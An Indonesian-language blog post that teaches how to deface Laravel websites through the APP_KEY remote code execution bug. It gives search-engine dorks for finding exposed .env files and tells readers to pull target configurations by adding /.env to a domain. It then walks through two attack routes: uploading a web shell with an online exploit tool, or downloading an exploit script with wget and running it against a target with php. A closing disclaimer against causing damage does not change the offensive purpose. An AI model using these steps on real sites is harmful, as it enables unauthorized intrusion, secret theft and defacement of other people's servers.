Baru-baru ini ramai banyak yang menyinggung cara deface menggunakan laravel RCE dimana dalam bug ini memanfaatkan APP_KEY sebagai bahan exploit nya dan kita dengan mudah bisa me-Remote server korban.
App_key ini biasanya di dapat dari file konfigurasi laravel yaitu .env ataupun dari kesalahan laravel debug. Kesalahan yang terjadi ini biasanya di manfaatkan untuk deface atau exploit pada web web laravel versi lama.
Lalu apakah semua situs laravel yang terdapat app_key nya bisa kita exploit dan kita remote ? TIDAK. Karena ada beberapa situs web yang sudah terintegrasikan dengan versi laravel yang baru dan bug ini sudah diperbaiki.
Jadi tidak perlu lama-lama lagi kita langsung saja membahas teknik cara deface laravel rce :
Dork
- inurl:/app/config
- inurl:/storage/
- inurl:/vendor/
- ext:env site:com
- inurl:/vendor ext:env site:net
- dll
Untuk cara dorking gunakan dork di atas dan bisa kalian rubah atau cari dork sendiri,karena yang terpenting adalah mendapatkan file konfigurasinya yaitu “.env”
Kemudia setelah kalian mendapatkan target situsnya silahkan masukan /.env di belakang domain. Contoh https://target.com/.env kalau bisa nanti akan muncul file confignya.

Cara Exploit
Kemudian untuk cara explotinya terdapat dua metode yaitu menggunakan Webapp dan juga CLI. Kalian bisa memilih sesuka kalian.
Laravel RCE via WebApps

- Masuk atau kunjungi situs https://exploit.anons79.com/
- Kemudian masukan web target di kolom target (perhatikan penggunaan http,https,dan www)
- Kemudian masukan app_key web tersebut yang tadi kalian sudah dapatkan
- Klik auto upload shell
- Jika berhasil nanti akan langsung muncul url shell nya
- Kalau tidak vuln berarti kalian harus mencari target lain
Laravel RCE via CLI

- Download dan install toolsnya terlebih dahulu
wget https://raw.githubusercontent.com/wibuheker/exploit/master/php/laravel/rce.php -O lararce.php
2. Lalu jalankan tools tersebut dengan command :
php lararce.php url=http://target/ method=1
Kalian juga bisa menggunakan app_key langsung kalau kalian mau,atau menggunakan command kalian sendiri dengan perintah yang tertera pada gambar diatas.
Oke mungkin cukup sekian tutorial cara deface laravel rce menggunakan appkey. Ingat,jangan pernah merusak,artikel ini kami buat dengan tujuan menambah wawasan kita bersama.
Big thanks to kalian semua,jangan lupa untuk share artikel ini ke teman teman mu ya.
Very nice article, I really like your blog post very much. Visit my blog too.
Website Management Indonesia
Install PHP CLI for android
QUIZ the legend of neverland
MIDI the legend of neverland
Recipes Chimeraland
White Maiden Chimeraland